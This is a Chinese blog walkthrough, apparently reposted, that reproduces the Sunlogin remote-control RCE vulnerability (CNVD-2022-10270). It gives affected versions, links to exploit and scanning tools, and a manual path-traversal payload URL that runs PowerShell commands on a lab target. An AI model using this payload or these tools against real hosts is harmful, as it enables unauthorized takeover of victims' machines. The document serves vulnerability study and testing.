CNVD-2022-10270/CNVD-2022-03672 向日葵RCE復現


0x00-引言


本文內容及使用工具僅限學習交流,用戶濫用造成的一切后果均與作者無關,作者不承擔任何直接責任, 后果均由用戶本人負責,使用者請務必遵守當地法律法規。

復現的速度趕不上大佬出腳本的速度,牛掰

0x01-漏洞描述


上海貝銳信息科技股份有限公司的向日葵遠控軟件存在遠程代碼執行漏洞(CNVD-2022-10270/CNVD-2022-03672),影響Windows系統使用的個人版和簡約版,攻擊者可利用該漏洞獲取服務器控制權。

影響版本:

向日葵個人版   for Windows <= 11.0.0.33
向日葵簡約版   <= V1.0.1.43315(2021.12)

0x02-漏洞復現


工具下載(含有漏洞版本的向日葵):
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

工具命令:

-h 指定目標
-t 選擇掃描或者命令執行 默認scan
-p 設置掃描端口范圍 默認4w到65535
-c 需要執行的命令
01-工具復現

打開向日葵(我的裝在虛擬機里面)

image-20220217152529772

使用工具掃描-掃描時間長

image-20220217152758729

命令執行

image-20220217152910697

02-手動復現

nmap探測或者其他工具探測

image-20220217153839299

瀏覽器訪問ip+端口號+cgi-bin/rpc?action=verify-haras(獲取session值CID)一個一個端口嘗試

image-20220217154020054

拿到CID-添加payload和cookie-發送

http://192.168.234.139:49676/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

image-20220217154326473

image-20220217154550219

03-批量檢測工具

建議使用kali跑腳本,因為腳本要使用nmap

工具下載:
https://github.com/mrknow001/Sunlogin-rce

image-20220217163926641

0x03-參考


https://mp.weixin.qq.com/s/h2h2sJsEEbXAYvxRl59uMw

https://www.t00ls.cc/articles-64617.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM